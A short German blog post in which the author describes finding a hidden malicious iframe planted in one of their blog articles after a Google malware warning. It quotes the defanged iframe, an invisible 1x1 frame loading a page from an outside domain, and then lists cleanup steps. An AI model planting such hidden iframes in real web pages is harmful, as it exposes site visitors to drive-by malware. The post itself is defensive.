Ich hätte ja nicht gedacht das mir sowas unbemerkt mal passieren könnte, aber wie so oft wird man meist eines besseren belehrt.
Vor einiger Zeit habe ich eine Meldung von Google bekommen das mein Blog mit “Malware” verseucht ist.
Eigentlich nicht möglich dachte ich mir und naja habe es so hingenommen, da ich zur Zeit sowieso keine Lust am Bloggen hatte.

Nun habe ich mich damit mal befasst und mit Hilfe des Google Webmaster Tools den “Fehler” Recht schnell ausfindig gemacht.
Ein versteckter iframe in einem geschriebenm Artikel riss eine riesen Sicherheitslücke auf.
Aussehen kann das in etwa so:

iframe src='http*//tr**fic-stocks*com/blank.php' width='1' height='1' style='visibility: hidden;'

Kaum war der Frame gelöscht lief alles wieder normal.

Erster Schritt:
Alle Passwörter ändern!

Zweiter Schritt:
Alles durchsuchen!

Dritter Schritt:
Nachdem alles gelöscht ist Passwort nochmal ändern!

Eine nette Überraschung auf jedenfall…